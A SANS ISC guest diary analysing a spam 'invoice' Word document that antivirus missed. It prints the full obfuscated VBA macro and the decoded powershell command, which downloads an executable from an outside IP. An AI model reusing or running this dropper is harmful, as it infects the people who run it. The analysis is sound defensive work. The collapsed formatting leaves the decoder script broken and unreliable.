Guest Diary: Xavier Mertens - Analyzing an MS Word document not detected by AV software, (Tue, Apr 7th)

[Guest Diary: Xavier Mertens] [Analyzing an MS Word document not detected by AV software]

Like everybody, Im receiving a lot of spam everyday but... I like it! All unsolicited received messages are stored in a dedicated folder for two purposes:

• An automatic processing via my tool mime2vt (http://blog.rootshell.be/2014/12/15/automatic-mime-parts-scanning-with-virustotal/)
• A manual review at regular interval

This helps me to find new types of spams or new techniques used by attackers to deliver malicious content in our mailboxes. Today, I received an interesting Word document. Im not sure if it is a very common one but I did a small analysis. The mail was based on a classic fake invoice notification:

From: Ollie Oconnor
To: xavier
Subject: 49933-Your Latest Documents from RS Components 570009054

The fake invoice was related to rswww.com which is a UK online shop for electronic devices, components and IT related stuffs. The attached Word document was processed by my MIME2VT tool but the VirusTotal score was 0/53(https://www.virustotal.com/en/file/be7a959827ff33ab04195111600efb576eeac11904ef9b666386f56dafd8cfba/analysis/)! Interesting... It was too tempting to make some manual investigations. Using Didier Stevens">$ ./oledump.py /tmp/20150331-A7740189461014146728299-1.doc1: 113 \x01CompObj2: 4096 \x05DocumentSummaryInformation3: 4096 \x05SummaryInformation4: 4096 1Table5: 4096 Data6: 490 Macros/PROJECT7: 65 Macros/PROJECTwm8: M 11613 Macros/VBA/Module19: M 1214 Macros/VBA/ThisDocument10: 2932 Macros/VBA/_VBA_PROJECT11: 1165 Macros/VBA/__SRP_012: 70 Macros/VBA/__SRP_113: 8430 Macros/VBA/__SRP_214: 103 Macros/VBA/__SRP_315: 561 Macros/VBA/dir16: 5684 WordDocument$ ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.docAttribute VB_Name = Module1Sub sdfsdfdsf()GVhkjbjv = chrw(49.5 + 49.5) chrw(54.5 + 54.5) chrw(50 + 50) chrw(16 + 16) chrw(23.5 + 23.5) chrw(37.5 + 37.5) chrw(16 + 16) chrw(56 + 56) chrw(55.5 + 55.5) chrw(59.5 + 59.5) chrw(50.5 + 50.5) chrw(57 + 57) chrw(57.5 + 57.5) chrw(52 + 52) chrw(50.5 + 50.5) chrw(54 + 54) chrw(54 + 54) chrw(23 + 23) chrw(50.5 + 50.5) chrw(60 + 60) chrw(50.5 + 50.5) chrw(16 + 16) chrw(22.5 + 22.5) chrw(34.5 + 34.5) chrw(60 + 60) chrw(50.5 + 50.5) chrw(49.5 + 49.5) chrw(58.5 + 58.5) chrw(58 + 58) chrw(52.5 + 52.5) chrw(55.5 + 55.5) chrw(55 + 55) chrw(40 + 40) chrw(55.5 + 55.5) chrw(54 + 54) chrw(52.5 + 52.5) chrw(49.5 + 49.5) chrw(60.5 + 60.5) chrw(16 + 16) chrw(49 + 49) chrw(60.5 + 60.5) chrw(56 + 56) chrw(48.5 + 48.5) chrw(57.5 + 57.5) chrw(57.5 + 57.5) chrw(16 + 16)GYUUYIiii = chrw(22.5 + 22.5) chrw(55 + 55) chrw(55.5 + 55.5) chrw(56 + 56) chrw(57 + 57) chrw(55.5 + 55.5) chrw(51 + 51) chrw(52.5 + 52.5) chrw(54 + 54) chrw(50.5 + 50.5) chrw(16 + 16) chrw(20 + 20) chrw(39 + 39) chrw(50.5 + 50.5) chrw(59.5 + 59.5) chrw(22.5 + 22.5) chrw(39.5 + 39.5) chrw(49 + 49) chrw(53 + 53) chrw(50.5 + 50.5) chrw(49.5 + 49.5) chrw(58 + 58) chrw(16 + 16) chrw(41.5 + 41.5) chrw(60.5 + 60.5) chrw(57.5 + 57.5) chrw(58 + 58) chrw(50.5 + 50.5) chrw(54.5 + 54.5) chrw(23 + 23) chrw(39 + 39) chrw(50.5 + 50.5) chrw(58 + 58) chrw(23 + 23) chrw(43.5 + 43.5) chrw(50.5 + 50.5) chrw(49 + 49) chrw(33.5 + 33.5) chrw(54 + 54) chrw(52.5 + 52.5) chrw(50.5 + 50.5) chrw(55 + 55) chrw(58 + 58) chrw(20.5 + 20.5) chrw(23 + 23)hgFYyhhshu = chrw(34 + 34) chrw(55.5 + 55.5) chrw(59.5 + 59.5) chrw(55 + 55) chrw(54 + 54) chrw(55.5 + 55.5) chrw(48.5 + 48.5) chrw(50 + 50) chrw(35 + 35) chrw(52.5 + 52.5) chrw(54 + 54) chrw(50.5 + 50.5) chrw(20 + 20) chrw(19.5 + 19.5) chrw(52 + 52) chrw(58 + 58) chrw(58 + 58) chrw(56 + 56) chrw(29 + 29) chrw(23.5 + 23.5) chrw(23.5 + 23.5) chrw(24.5 + 24.5) chrw(28 + 28) chrw(26.5 + 26.5) chrw(23 + 23) chrw(25.5 + 25.5) chrw(28.5 + 28.5) chrw(23 + 23) chrw(24.5 + 24.5) chrw(26 + 26) chrw(28.5 + 28.5) chrw(23 + 23) chrw(25 + 25) chrw(24.5 + 24.5) chrw(23.5 + 23.5) chrw(53 + 53) chrw(57.5 + 57.5) chrw(48.5 + 48.5) chrw(60 + 60) chrw(55.5 + 55.5) chrw(28 + 28) chrw(58.5 + 58.5) chrw(23.5 + 23.5) chrw(51.5 + 51.5) chrw(25.5 + 25.5) chrw(28.5 + 28.5) chrw(49 + 49) chrw(25 + 25) chrw(49.5 + 49.5) chrw(60 + 60) chrw(23 + 23) chrw(50.5 + 50.5) chrw(60 + 60) chrw(50.5 + 50.5) chrw(19.5 + 19.5)GYiuudsuds = chrw(22 + 22) chrw(19.5 + 19.5) chrw(18.5 + 18.5) chrw(42 + 42) chrw(34.5 + 34.5) chrw(38.5 + 38.5) chrw(40 + 40) chrw(18.5 + 18.5) chrw(46 + 46) chrw(26 + 26) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(23 + 23) chrw(49.5 + 49.5) chrw(48.5 + 48.5) chrw(49 + 49) chrw(19.5 + 19.5) chrw(20.5 + 20.5) chrw(29.5 + 29.5) chrw(16 + 16) chrw(50.5 + 50.5) chrw(60 + 60) chrw(56 + 56) chrw(48.5 + 48.5) chrw(55 + 55) chrw(50 + 50) chrw(16 + 16)shdfihiof = chrw(18.5 + 18.5) chrw(42 + 42) chrw(34.5 + 34.5) chrw(38.5 + 38.5) chrw(40 + 40) chrw(18.5 + 18.5) chrw(46 + 46) chrw(26 + 26) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(23 + 23) chrw(49.5 + 49.5) chrw(48.5 + 48.5) chrw(49 + 49) chrw(16 + 16) chrw(18.5 + 18.5) chrw(42 + 42) chrw(34.5 + 34.5) chrw(38.5 + 38.5) chrw(40 + 40) chrw(18.5 + 18.5) chrw(46 + 46) chrw(26 + 26) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(23 + 23)doifhsoip = chrw(50.5 + 50.5) chrw(60 + 60) chrw(50.5 + 50.5) chrw(29.5 + 29.5) chrw(16 + 16) chrw(57.5 + 57.5) chrw(58 + 58) chrw(48.5 + 48.5) chrw(57 + 57) chrw(58 + 58) chrw(16 + 16) chrw(18.5 + 18.5) chrw(42 + 42) chrw(34.5 + 34.5) chrw(38.5 + 38.5) chrw(40 + 40) chrw(18.5 + 18.5) chrw(46 + 46) chrw(26 + 26) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(26.5 + 26.5) chrw(26 + 26) chrw(25.5 + 25.5) chrw(23 + 23) chrw(50.5 + 50.5) chrw(60 + 60) chrw(50.5 + 50.5) chrw(29.5 + 29.5)JHGUgisdc = GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoipIUGuyguisdf = Shell(JHGUgisdc, 0)End Sub

The macro is quite simple: a shell command is obfuscated by multiple chrw() functions to generate substrings which are concatenated and passwed to the Shell() function to be executed. Lets write a small python script to decode this. I">#!/usr/bin/pythonimport reimport sysdata = sys.stdin.read()r = re.compile(chrw\((\S+) \+ (\S+)\))i = re.findall(r, data)cmd = for match in i: cmd = cmd + chr(int(float(match[0]) + float(match[1]))"># ./oledump.py -s 8 -v /tmp/20150331-A7740189461014146728299-1.doc | ./decode.pycmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(http://185.39.149.21/jsaxo8u/g39b2cx.exe,%TEMP%\4543543.cab

The webserver being the IP address 185.39.149.21 (located in Russia) is down at the moment... Im keeping an eye on it...

--
Alex Stanford - GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center
/in/alexstanford

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.